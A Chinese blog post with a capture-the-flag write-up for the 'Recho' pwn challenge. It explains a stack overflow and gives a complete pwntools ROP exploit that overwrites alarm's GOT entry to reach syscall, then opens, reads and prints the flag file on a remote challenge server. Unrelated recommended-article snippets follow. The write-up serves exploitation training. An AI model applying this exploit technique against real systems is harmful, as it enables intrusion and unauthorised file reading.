pwn-Recho

最新推荐文章于 2025-08-05 17:20:40 发布
最新推荐文章于 2025-08-05 17:20:40 发布
阅读量368 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43647628/article/details/120187348

1.题目

1.1.保护机制

开启nx

1.2.关键代码

在这里插入图片描述

2.思路

重点1:看出来是个很简单的栈溢出,但是第一个问题是这个循环是个死循环,如果直接使用close()函数程序会直接退出,查询资料后发现pwn库中提供了shutdown()函数,他可以关闭IO流,即让循环正常退出

重点2:既然使用shutdown函数,我们必须一次性将payload发送过去,这就导致我们不能使用内存泄漏来泄漏system函数,查询了一下字符串发现有一个flag,所以我们考虑使用系统调用完成,alarm,open,read,write函数的实现都是通过syscall实现的,我们选择将alarm_got覆盖成syscall,通过调试发现syscall就在alarm函数中+5的位置,那我们只需要让alarm_got指向的地址+5即可

重点3:然后使用open系统调用打开文件流,再用read函数读取(fd是3,0,1,2已经分别被标准输入、标准输出、标准错误所占用),然后使用printf输出

from pwn import *
from ctypes import *

context(arch="amd64",os="linux",log_level="debug")
con = remote('111.200.241.244',50865)
#con = process('./pwn')
elf = ELF('./pwn')
pop_rdi = 0x4008a3
pop_rsi_r15 = 0x4008a1
pop_rdx = 0x4006fe
pop_rax = 0x4006fc
add_prdi_al = 0x40070d
offset = 0x5
alarm_got = elf.got['alarm']
alarm_plt = elf.plt['alarm']
printf_addr = elf.plt['printf']
read_addr = elf.plt['read']
flag_addr = 0x601058
n_sys_open = 0x2
O_RDONLY = 0x0
bss_addr = 0x601070
fd = 0x3

payload = "A"*56
# hack alarm_got
payload += p64(pop_rax)+p64(offset)+p64(pop_rdi)+p64(alarm_got)+p64(add_prdi_al)
# call open sys_call
payload += p64(pop_rax)+p64(0x2)+p64(pop_rdi)+p64(flag_addr)+p64(pop_rsi_r15)+p64(O_RDONLY)+p64(0x0)+p64(alarm_plt)
# read(fd,bss_addr,0x50)
payload += p64(pop_rdi)+p64(fd)+p64(pop_rsi_r15)+p64(bss_addr)+p64(0x0)+p64(pop_rdx)+p64(0x50)+p64(read_addr)
# printf(bss_addr)
payload += p64(pop_rdi)+p64(bss_addr)+p64(printf_addr)

payload = payload.ljust(0x200,"A")

con.sendlineafter("server!\n",str(0x200))
con.send(payload)
con.recv()

con.shutdown()
con.interactive()
DHCP服务器 使用RHEL-3搭建DHCP服务器,用RHEL-4客户端验证
10-28
DHCP(Dynamic Host Configuration Protocol)是一种网络协议,用于自动分配或动态地重新分配IP地址、子网掩码、默认网关、DNS服务器等网络参数给网络中的设备。在这个场景中,我们将探讨如何在RHEL-3系统上设置DHCP...
通过一次完整DNS从根域解析至主机的过程学习
wangli的博客
11-08 6234
     通过dig从B根域服务器完成跟踪www.taobao.com完整解析过程,通过分析解析过程的交互来加深理解DNS体系知识。 dig输出主要内容解释: QUESTION SECTION:查询的内容 ANSWER SECTION:相应的内容,一般会得到至少一条A记录,否则就还没定义 AUTHORITY SECTION:授权信息 ADDITIONAL SECTION:每个授权服务器的IP地...
rhel 9 搭建dns服务器
qq_44484541的博客
04-02 659
2.修改客户端dns地址为192.168.100.34。#复制域名解析文件为主配置中修改过的文件名。#允许所有客户端访问。#添加域名的正向解析和反向解析。4.防火墙开放dns服务端口。1.客户端安装dns测试工具。#配置正向域名解析文件。#配置反向域名解析文件。1.安装dns服务器3.配置域名解析文件。
RHEL5搭建 DNS 服务器
weixin_33878457的博客
11-26 84
RHEL5搭建DNS服务器 一、域名与域名解析 网络中为了区别各个主机,必须为每台主机分配一个惟一的地址,这个地址即称为“IP地址”。但这些数字难以记忆,所以就采用“域名”的方式来取代这些数字了。不过最终还是必须将域名转换为对应的IP地址才能访问主机。DNS 服务,又叫域名解析服务,即提供域名与IP地址的相互转换。域名的正向解析是将主机名转换成 IP 地址的过程,域名的反向...
linux 6 dns,RHEL6下搭建DNS服务器
weixin_33602725的博客
05-15 242
DNS是大部分网络服务基石,DNS解释的主要作用就是让域名替换IP,即:人们通过记忆的域名找到该域名所对应的物理主机的真实地址,可以方便人记忆。所以说DNS解释是大部分网络服务的基石,可想而知,人记IP地址的话,最多可以记上几个!上一篇博文中介绍了RHEL6中搭建本地YUM库的方法。这里我们用上了。下面就用YUM软件包管理器的方法安装DNS服务器的所需组件。这里就是最简单的安装DNS服务,用的DN...
企业内部搭建DNS服务器指南
lanwp5302的博客
05-18 1205
在企业内部搭建DNS服务器可以提高网络访问效率、增强安全性和实现内部域名解析。以下是详细的企业DNS服务器搭建方案。
RHEL5搭建DNS服务器(感谢)
unixlinuxsys的专栏
05-28 585
一、域名与域名解析网络中为了区别各个主机,必须为每台主机分配一个惟一的地址,这个地址即称为“IP地址”。但这些数字难以记忆,所以就采用“域名”的方式来取代这些数字了。不过最终还是必须将域名转换为对应的IP地址才能访问主机。DNS服务,又叫域名解析服务,即提供域名与IP地址的相互转换。域名的正向解析是将主机名转换成IP地址的过程,域名的反向解析是将IP地址转换成主机名的过程。通常我们很少
搭建DNS服务器实现域名解析
の正在缓存99%
05-24 2145
加入此行。先定义密钥名type slave;采用密钥进行同步。
Linux(RHEL7及CentOS7)下DNS服务器搭建与配置
热门推荐
晨曦蜗牛
01-03 2万+
一、基本概念 DNS即Domain Name System,域名系统,因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过主机名,最终得到该主机名对应的IP地址的过程叫做域名解析(或主机名解析)。DNS协议运行在UDP协议之上,使用端口号53。在RFC文档中RFC 2181对DNS有规范说明,RFC 2136对DNS
RHEL7(centos7)下DNS服务的搭建与配置
ro4lsc的博客
01-21 6335
本文讲述的是RHEL7下DNS服务的搭建与配置,希望能对您有所帮助,由于水平有限,在一些地方肯定有纰漏与不足,还请谅解,写作实属不易,还望支持!
RHE5服务器管理 搭建DNS服务器步骤说明[图文]
09-30
### RHE5搭建DNS服务器的关键步骤与概念详解 #### 一、DNS主要配置文件及其作用 1. **`/etc/hosts`**: 这是一个简单的文本文件,用于存放主机名到IP地址的映射关系。它对于那些静态IP地址的系统来说非常有用,...
超算中尝试安装dify(失败)
skywalk8163的专栏
08-01 228
摘要:本文记录了在超算平台安装Dify的失败尝试。作者在超算容器中克隆Dify源码并尝试安装Docker-compose,但由于超算平台容器内无法启动Docker服务而失败。最终确认超算容器环境不支持嵌套容器化,导致Dify安装无法完成。作者指出可在其他服务器上成功安装Dify。(99字)
HiveMQ 2024.9 设计与开发文档
m0_37909265的博客
08-03 1025
HiveMQ Community Edition 是一个高性能的MQTT代理服务器,完整支持MQTT 3.1.1和5.0协议。核心特性包括基于Netty的异步网络架构、可扩展框架、多种持久化方案和安全机制。系统采用模块化设计,包含网络层、协议处理层、核心服务层和扩展框架等组件,通过Guice实现依赖注入。文档详细分析了启动流程、核心模块、持久化机制和扩展开发等关键设计,并提供了架构图和模块依赖关系说明。
JVM 01 运行区域
2301_79308687的博客
08-02 1093
虚拟机隐藏平台差异,解决不同平台代码运行结果不一致问题,实现,实现用户代码跨平台。它本身是一个操作系统上的应用程序,将字节码文件翻译成特定机器的机器码。
Ollama前端:open-webui
08-02 293
【代码】Ollama前端:open-webui。
JumpServer 堡垒机全流程搭建指南及常见问题解决方案
最新发布
2401_83649605的博客
08-05 991
文章详细介绍了JumpServer的技术架构和部署流程,包括基础环境配置、数据库安装等步骤。JumpServer采用分布式架构,支持多机房部署,无资产数量和并发限制,是企业IT安全运维的理想选择。
MySQL——运维
m0_59855153的博客
08-03 777
前置:使用Linux
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值